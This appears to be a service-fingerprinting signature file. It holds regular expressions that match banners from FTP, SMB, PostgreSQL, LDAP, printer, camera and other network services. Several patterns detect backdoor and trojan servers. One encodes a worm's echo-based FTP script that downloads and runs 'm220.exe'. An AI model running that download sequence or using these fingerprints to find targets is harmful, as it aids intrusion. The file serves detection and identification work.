+Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) 